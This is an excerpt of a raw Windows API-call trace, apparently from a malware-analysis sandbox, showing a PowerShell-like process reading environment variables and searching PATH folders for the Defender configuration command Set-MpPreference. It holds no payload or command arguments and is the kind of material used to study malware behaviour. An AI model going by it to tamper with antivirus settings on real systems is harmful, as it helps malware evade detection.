	[0044.239] GetLastError () returned 0x0
	[0044.239] CloseHandle (hObject=0x31c) returned 1
	[0044.239] GetLastError () returned 0x0
	[0044.240] UnmapViewOfFile (lpBaseAddress=0x1f30000) returned 1
	[0044.245] CloseHandle (hObject=0x3c8) returned 1
	[0044.245] GetLastError () returned 0x0

Thread:
	id = 21
	os_tid = 0xe18

	[0042.456] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0042.502] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0042.508] VirtualQuery (in: lpAddress=0x573e5e0, lpBuffer=0x573f5e0, dwLength=0x1c | out: lpBuffer=0x573f5e0*(BaseAddress=0x573e000, AllocationBase=0x4db0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.512] GetLastError () returned 0xcb
	[0042.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.515] GetLastError () returned 0xcb
	[0042.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.516] GetLastError () returned 0xcb
	[0042.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.532] GetLastError () returned 0xcb
	[0042.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.536] GetLastError () returned 0xcb
	[0042.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.538] GetLastError () returned 0xcb
	[0042.545] VirtualQuery (in: lpAddress=0x573e6fc, lpBuffer=0x573f6fc, dwLength=0x1c | out: lpBuffer=0x573f6fc*(BaseAddress=0x573e000, AllocationBase=0x4db0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.546] GetLastError () returned 0xcb
	[0042.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.548] GetLastError () returned 0xcb
	[0042.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.548] GetLastError () returned 0xcb
	[0042.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.556] GetLastError () returned 0xcb
	[0042.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.573] GetLastError () returned 0xcb
	[0042.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.607] GetLastError () returned 0xcb
	[0042.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.609] GetLastError () returned 0xcb
	[0042.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.610] GetLastError () returned 0xcb
	[0042.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.612] GetLastError () returned 0xcb
	[0042.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.613] GetLastError () returned 0xcb
	[0042.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.615] GetLastError () returned 0xcb
	[0042.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.616] GetLastError () returned 0xcb
	[0042.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.637] GetLastError () returned 0xcb
	[0042.645] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0042.645] GetLastError () returned 0xcb
	[0042.649] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x88
	[0042.649] GetLastError () returned 0xcb
	[0042.649] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1d5600, nSize=0x88 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0042.649] GetLastError () returned 0xcb
	[0042.658] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1d57f8 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0042.658] GetLastError () returned 0xcb
	[0042.667] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.667] GetLastError () returned 0xcb
	[0042.668] SetErrorMode (uMode=0x1) returned 0x1
	[0042.670] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.ps1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.671] GetLastError () returned 0x2
	[0042.671] SetErrorMode (uMode=0x1) returned 0x1
	[0042.672] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.672] GetLastError () returned 0x2
	[0042.672] SetErrorMode (uMode=0x1) returned 0x1
	[0042.672] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psm1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.673] GetLastError () returned 0x2
	[0042.673] SetErrorMode (uMode=0x1) returned 0x1
	[0042.673] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.673] GetLastError () returned 0x2
	[0042.673] SetErrorMode (uMode=0x1) returned 0x1
	[0042.673] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psd1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.673] GetLastError () returned 0x2
	[0042.673] SetErrorMode (uMode=0x1) returned 0x1
	[0042.673] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.673] GetLastError () returned 0x2
	[0042.673] SetErrorMode (uMode=0x1) returned 0x1
	[0042.673] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.COM", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.673] GetLastError () returned 0x2
	[0042.674] SetErrorMode (uMode=0x1) returned 0x1
	[0042.674] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.674] GetLastError () returned 0x2
	[0042.674] SetErrorMode (uMode=0x1) returned 0x1
	[0042.674] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.EXE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.674] GetLastError () returned 0x2
	[0042.674] SetErrorMode (uMode=0x1) returned 0x1
	[0042.674] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.674] GetLastError () returned 0x2
	[0042.674] SetErrorMode (uMode=0x1) returned 0x1
	[0042.674] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.BAT", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.674] GetLastError () returned 0x2
	[0042.674] SetErrorMode (uMode=0x1) returned 0x1
	[0042.675] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.675] GetLastError () returned 0x2
	[0042.675] SetErrorMode (uMode=0x1) returned 0x1
	[0042.675] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.CMD", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.675] GetLastError () returned 0x2
	[0042.675] SetErrorMode (uMode=0x1) returned 0x1
	[0042.675] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.675] GetLastError () returned 0x2
	[0042.675] SetErrorMode (uMode=0x1) returned 0x1
	[0042.675] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.675] GetLastError () returned 0x2
	[0042.675] SetErrorMode (uMode=0x1) returned 0x1
	[0042.675] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.675] GetLastError () returned 0x2
	[0042.675] SetErrorMode (uMode=0x1) returned 0x1
	[0042.676] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.676] GetLastError () returned 0x2
	[0042.676] SetErrorMode (uMode=0x1) returned 0x1
	[0042.676] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.676] GetLastError () returned 0x2
	[0042.676] SetErrorMode (uMode=0x1) returned 0x1
	[0042.676] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.676] GetLastError () returned 0x2
	[0042.676] SetErrorMode (uMode=0x1) returned 0x1
	[0042.676] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.676] GetLastError () returned 0x2
	[0042.676] SetErrorMode (uMode=0x1) returned 0x1
	[0042.677] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JSE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.677] GetLastError () returned 0x2
	[0042.677] SetErrorMode (uMode=0x1) returned 0x1
	[0042.677] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.677] GetLastError () returned 0x2
	[0042.677] SetErrorMode (uMode=0x1) returned 0x1
	[0042.677] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSF", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.677] GetLastError () returned 0x2
	[0042.677] SetErrorMode (uMode=0x1) returned 0x1
	[0042.677] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.677] GetLastError () returned 0x2
	[0042.677] SetErrorMode (uMode=0x1) returned 0x1
	[0042.714] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSH", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.714] GetLastError () returned 0x2
	[0042.714] SetErrorMode (uMode=0x1) returned 0x1
	[0042.714] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.714] GetLastError () returned 0x2
	[0042.714] SetErrorMode (uMode=0x1) returned 0x1
	[0042.714] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.MSC", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.714] GetLastError () returned 0x2
	[0042.714] SetErrorMode (uMode=0x1) returned 0x1
	[0042.714] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0042.714] GetLastError () returned 0x2
	[0042.714] SetErrorMode (uMode=0x1) returned 0x1
	[0042.715] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.715] GetLastError () returned 0x2
	[0042.715] SetErrorMode (uMode=0x1) returned 0x1
	[0042.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.717] GetLastError () returned 0x2
	[0042.717] SetErrorMode (uMode=0x1) returned 0x1
	[0042.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.717] GetLastError () returned 0x2
	[0042.717] SetErrorMode (uMode=0x1) returned 0x1
	[0042.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.717] GetLastError () returned 0x2
	[0042.717] SetErrorMode (uMode=0x1) returned 0x1
	[0042.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.718] GetLastError () returned 0x2
	[0042.718] SetErrorMode (uMode=0x1) returned 0x1
	[0042.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.718] GetLastError () returned 0x2
	[0042.718] SetErrorMode (uMode=0x1) returned 0x1
	[0042.718] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.718] GetLastError () returned 0x2
	[0042.718] SetErrorMode (uMode=0x1) returned 0x1
	[0042.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.718] GetLastError () returned 0x2
	[0042.718] SetErrorMode (uMode=0x1) returned 0x1
	[0042.718] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.718] GetLastError () returned 0x2
	[0042.719] SetErrorMode (uMode=0x1) returned 0x1
	[0042.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.719] GetLastError () returned 0x2
	[0042.719] SetErrorMode (uMode=0x1) returned 0x1
	[0042.719] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.719] GetLastError () returned 0x2
	[0042.719] SetErrorMode (uMode=0x1) returned 0x1
	[0042.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.719] GetLastError () returned 0x2
	[0042.719] SetErrorMode (uMode=0x1) returned 0x1
	[0042.719] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.719] GetLastError () returned 0x2
	[0042.719] SetErrorMode (uMode=0x1) returned 0x1
	[0042.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.720] GetLastError () returned 0x2
	[0042.720] SetErrorMode (uMode=0x1) returned 0x1
	[0042.720] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.720] GetLastError () returned 0x2
	[0042.720] SetErrorMode (uMode=0x1) returned 0x1
